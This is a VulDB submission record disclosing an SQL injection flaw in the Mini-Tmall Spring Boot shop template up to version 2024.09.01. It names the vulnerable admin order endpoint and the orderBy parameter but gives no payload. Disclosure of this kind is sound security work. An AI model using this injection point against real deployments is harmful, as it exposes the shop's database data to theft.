| Title | Mini-Tmall 2024.09.01 SQL Injection |
|---|
| Description | # Description of the vulnerability
Mini-Tmall is a mini Tmall mall based on Spring Boot, which can be quickly deployed and run, and is suitable as a template for completion.
In the tmall/admin/order/1/1?orderBy=1 version of Mini-Tmall v2024.09.01 and earlier versions of Mini-Tmall v2024.09.01, an SQL injection vulnerability exists because the application lacks validation of external input SQL statements, and an attacker can execute illegal SQL commands to obtain sensitive database data.
# System situation
## version
Before September 1, 2024
## Project address
[https://gitee.com/project_team/Tmall_demo](https://gitee.com/project_team/Tmall_demo)
## Affected parameters:
orderBy
More details are connected below:
https://gitee.com/A0kooo/cve_article/blob/master/Mini-Tmall/Tmall_demo%20OrderController.java%20SQL%20Injection.md |
|---|
| Source | ⚠️ https://gitee.com/A0kooo/cve_article/blob/master/Mini-Tmall/Tmall_demo%20OrderController.java%20SQL%20Injection.md |
|---|
| User | 0kooo (UID 73212) |
|---|
| Submission | 09/01/2024 09:20 AM (10 months ago) |
|---|
| Moderation | 09/07/2024 08:25 AM (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 276798 [Mini-Tmall up to 20240901 tmall/admin/order/1/1 rewardMapper.select orderBy sql injection] |
|---|
| Points | 20 |
|---|